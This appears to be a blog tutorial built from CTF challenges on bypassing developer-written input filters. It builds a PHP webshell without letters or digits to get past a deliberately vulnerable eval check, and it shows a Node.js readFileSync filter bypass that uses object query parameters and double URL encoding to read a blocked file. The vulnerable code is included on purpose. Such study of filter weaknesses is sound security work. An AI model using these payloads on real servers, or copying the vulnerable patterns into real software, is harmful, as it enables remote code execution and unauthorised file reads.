In this article, we are going to discuss the topic of Input validation and its exploitation.  this could get a little advance for a beginner who hasn’t seen or developed any web application before. But I would suggest you still read it once. you may see get an idea of what it is about and why it matters in the real world so much to implement our own custom input validation mechanism.

There are many WAFs (web application firewalls) present nowadays. you may already know if you are an owner of a website. Let me explain to you WAF by an example, (all the bug hunters can relate to this) you must have seen it on some websites or I should say mostly all websites return some error when you send a simple cross-site scripting payload or some other malicious data. well, this happens because a WAF is preventing all your hacking attempts. It uses regex and some payload lists and compares them with what the user requests. it redirects you to some page where it may say “Forbidden Request” or something like that.

But when you don’t have money to buy a WAF you just try to implement it in your code. you just make sure that you process the request only when it is normal (have no malicious payload). while doing such a thing, it is possible that the developer has left a loophole that the attacker can exploit. and that is what we are going to do in this article. we will code the WAF and filter out the website. I will be explaining two approaches which I faced in CTF challenges.

# 1

The first validation is implemented in PHP. suppose you have an input field on a website and in the backend, the following code is checking your input.

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}
?>

preg_match — Perform a regular expression match. read more

And we all know what eval function does. so, the preg_math will return true if the GET parameter shell contains any alphabets or any number. and if so, then the NOT operator(!) will change that true to false and will never execute eval. so, In order to execute our input, we must make sure that it doesn’t contain any alpha-numeric char. and if we are able to do that, we will have an RCE.

There is this way you can execute your functions in PHP. you can store your function name in a variable and call that variable using parenthesis.

php > $a="system";
php > $a('id');
uid=0(root) gid=0(root) groups=0(root)
php > 

so, if it’s still not clear to you then in simple words, I want to insert `system(‘id’)` in the eval function. And in order to do so, there has to be no alpha-numeric character. actually, there is one character `_` (underscore) which is used while naming variables. so, we can just use one character multiple times (_, __, ___, ____, etc) to name variables.

so the idea goes like this, I will create a variable which will contain an array. And we will get the type of the array `Array`, and let another variable contain its index 0 value `A`. And from here, we can just increment it to get any char we want.

try this in your PHP shell.

php > $_=[];
php > echo $_;
PHP Warning:  Array to string conversion in php shell code on line 1
Array
php > 

it results in `Array` in echo. but there is a warning, so to remove warnings and errors in PHP we can use `@` in PHP.

php > echo @"$_";
Array
php > 

now we can store it.

php > $_=@"$_";

now, we want the 0th index of the $_ variable. to do so, we will have to write 0, and we are not allowed to write any number. to overcome this condition, we can use the relation operator.

php > echo $_['!'=='@'];
PHP Warning:  String offset cast occurred in php shell code on line 1
A

and again to suppress this warning, we can use ‘@’ and store it in the variable.

$_=@$_['!'=='@'];

now we have `A` in the $_ variable. we can use the increment operator to move from `A` to `Z`.

for example, If I want to create SYSTEM I can do something like this.

$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

and when we want the next character (`Y`), I can create another variable using underscore (_).

$___=$_;
$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;

and we can do the same with the rest of the characters. and later we can merge all those variables using .= (in PHP). In the system function we can write `$_POST[“CMD”]`. and it is possible with the same technique above. and we can just use special symbols so $,[,].,” won’t do any harm.

reference:-https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/\

# 2

The second technique I wanted to share is related to nodeJS which I found while reading a CTF walkthrough. Look at this code below and try to find a way to exploit it.

app.get("/", (req, res) => {
    try {
        res.setHeader("Content-Type", "text/html");
        res.send(fs.readFileSync(req.query.file || "index.html").toString());       
    }
    catch(err) {
        console.log(err);
        res.status(500).send("Internal server error");
    }
});

app.use((req, res, next) => {
    if([req.body, req.headers, req.query].some(
        (item) => item && JSON.stringify(item).includes("flag")
    )) {
        return res.send("bad hacker!");
    }
    next();
});

There has to be something wrong with `req.query.file`. because it is the only way for users to interact with it. There is this thing with `req.query.<parameter>`, you can literally input the list as well as a dictionary with keys and values along with simple string. here’s the code, just save it in your system and run it with nodejs command.

var express = require('express');
var app = express(); 
var PORT = 3000;
  
app.get('/profile', function (req, res) {
  console.log(req.query.name);
  res.send();
});
  
app.listen(PORT, function(err){
    if (err) console.log(err);
    console.log("Server listening on PORT", PORT);
});

Important – *npm install express*

If we add `fs.readFileSync(req.query.name)` in our above code and give the file parameter a list or a dictionary. we see the following output.

Server listening on PORT 3000
TypeError [ERR_INVALID_ARG_TYPE]: The "path" argument must be of type string or an instance of Buffer or URL. Received an instance of Array
    at Object.openSync (node:fs:577:10)
    at Object.readFileSync (node:fs:453:35)
    at /tmp/index.js:5:59
    at Layer.handle [as handle_request] (/tmp/node_modules/express/lib/router/layer.js:95:5)
    at next (/tmp/node_modules/express/lib/router/route.js:144:13)
    at Route.dispatch (/tmp/node_modules/express/lib/router/route.js:114:3)
    at Layer.handle [as handle_request] (/tmp/node_modules/express/lib/router/layer.js:95:5)
    at /tmp/node_modules/express/lib/router/index.js:284:15
    at Function.process_params <em>(/tmp/node_modules/express/lib/router/index.js:346:12)
</em>    at next (/tmp/node_modules/express/lib/router/index.js:280:10)

This is when I run `curl ‘localhost:3000/profile?name[]=abc’ `. The error says `The "path" argument must be of type string or an instance of Buffer or URL. Received an instance of Array` which means we are supposed to give it a string or something valid, not a list/array. let’s quickly review the  readFileSync's source code.

https://github.com/nodejs/node/blob/v18.x/lib/fs.js#L464

Going down the call stack with our path argument, we see that this happens:

readFileSync -> openSync -> getValidatedPath (in `internal/fs/utils.js`) -> toPathIfFileURL (in `internal/url.js`)
The first function `readFileSync` function checks for what to do with files as in reading or writing (getOptions). then there are some lines which check whether the given value is a file descriptor or not. it checks it using a ternary operator where it uses one more function `fs.openSync(path, options.flag, 0o666);` (false condition). and then the function `getValidatePath` is called with our given input which basically checks if we have given it a URL or just a filename. (file:///etc/passwd || /etc/passwd). if it is a URL it converts it to the path using `fileURLToPath` function and it errors out if the scheme is other than `file://`. Focus on the code below.
function getValidatedPath (fileURLOrPath) {
  const path = fileURLOrPath != null && fileURLOrPath.href
      && fileURLOrPath.origin
    ? fileURLToPath(fileURLOrPath)
    : fileURLOrPath
  return path
}
Line no.2 & 3 is treating the fileURLOrPath argument as a dictionary and trying to access the value of href and origin key’s values.
hmmm, interesting because ultimately we are the one who is setting up the fileURLOrPath’s value. And I told you in the starting that we can send a dictionary in the query. now let’s get to `fileURLToPath` function where it checks the OS, and it is Linux, for some obvious reasons (windows sucks). the `getPathFromURLPosix` functions runs. check out its code below.
function getPathFromURLPosix(url) {
  if (url.hostname !== '') {
    throw new ERR_INVALID_FILE_URL_HOST(platform);
  }
  const pathname = url.pathname;
  for (let n = 0; n < pathname.length; n++) {
    if (pathname[n] === '%') {
      const third = pathname.codePointAt(n + 2) | 0x20;
      if (pathname[n + 1] === '2' && third === 102) {
        throw new ERR_INVALID_FILE_URL_PATH(
          'must not include encoded / characters'
        );
      }
    }
  }
  return decodeURIComponent(pathname);
}

in this code, it requires the `pathname` key’s value (again controlled by us). the loop logic checks whether there is an URL encoded `/` (%2f). I don’t know why didn’t they check for the uppercase F, maybe I didn’t see the logic where they changed the pathname to lowercase alphabets. other than %2F, every encoded char is accepted. maybe that’s all we need to bypass the WAF.

var express = require('express');
var fs = require("fs");
 var app = express();
 var PORT = 3000;
 app.get('/profile', function (req, res) { console.log(fs.readFileSync(req.query.name));
 res.send();
 });
 app.listen(PORT, function(err){ if (err) console.log(err);
 console.log("Server listening on PORT", PORT);
 });

app.get("/file", (req, res) => {
    try {
      if([req.body, req.headers, req.query].some(
        (item) => item && JSON.stringify(item).includes("flag")
    )) {
        return res.send("bad hacker!");
      }
        res.setHeader("Content-Type", "text/html");
        res.send(fs.readFileSync(req.query.file || "index.html").toString());       
    }
    catch(err) {
        console.log(err);
        res.status(500).send("Internal server error");
    }
});
Response:
actually, we haven’t bypassed anything yet (the check for flag keyword in the request). we need to double URL encode any single or multiple chars in the `flag` word. because the express will decode it once and the second decoding function is running inside ` getPathFromURLPosix`. and yes that’s how you bypassed this security implementation.
but honestly saying, I don’t it is that difficult to read the source of a library after working on this. all you need to learn is logic and then it won’t matter if you have worked on that language/framework before or not.

LEAVE A REPLY

Please enter your comment!
Please enter your name here